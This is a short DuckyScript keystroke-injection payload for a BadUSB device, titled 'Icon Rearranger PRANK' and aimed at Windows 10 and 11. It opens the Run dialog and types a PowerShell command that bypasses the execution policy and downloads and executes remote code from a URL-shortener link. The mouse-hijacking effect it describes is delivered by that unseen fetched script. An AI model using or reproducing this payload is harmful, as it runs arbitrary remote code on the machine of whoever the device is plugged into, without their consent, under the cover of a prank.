Files
2026-03-27 21:01:40 +00:00

14 lines
362 B
Plaintext

REM Title: Icon Rearranger PRANK
REM Author: @beigeworm
REM Description: Hijacks the mouse and continuously minimizees all windows and drags around the desktop attempting to rearrange icons
REM Target: Windows 10 and 11
DEFAULT_DELAY 100
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C $randomVar = 'var'; iex (irm is.gd/lh92CZ)
ENTER